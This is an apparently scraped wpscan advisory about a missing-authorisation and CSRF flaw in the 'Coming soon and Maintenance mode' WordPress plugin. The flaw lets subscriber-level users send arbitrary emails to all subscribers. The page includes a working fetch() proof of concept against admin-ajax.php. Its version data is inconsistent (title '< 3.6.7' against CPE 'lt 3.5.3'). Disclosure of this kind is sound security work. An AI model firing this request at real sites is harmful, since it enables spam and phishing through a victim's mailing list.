Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:942535F9-73BF-4467-872A-20075F03BC51
HistoryJan 24, 2022 - 12:00 a.m.

Coming soon and Maintenance mode < 3.6.7 - Subscriber+ Arbitrary Email Sending to Subscribed Users

2022-01-2400:00:00
Krzysztof Zając
wpscan.com
3

0.001 Low

EPSS

Percentile

21.3%

The plugin does not have authorisation and CSRF checks in its coming_soon_send_mail AJAX action, allowing any authenticated users, with a role as low as subscriber to send arbitrary emails to all subscribed users

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=coming_soon_send_mail&massage;_title=title&massage;_description=description&massage;_from_name=from&massage;[email protected]”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));

CPENameOperatorVersion
coming-soon-pagelt3.5.3

0.001 Low

EPSS

Percentile

21.3%

Related for WPVDB-ID:942535F9-73BF-4467-872A-20075F03BC51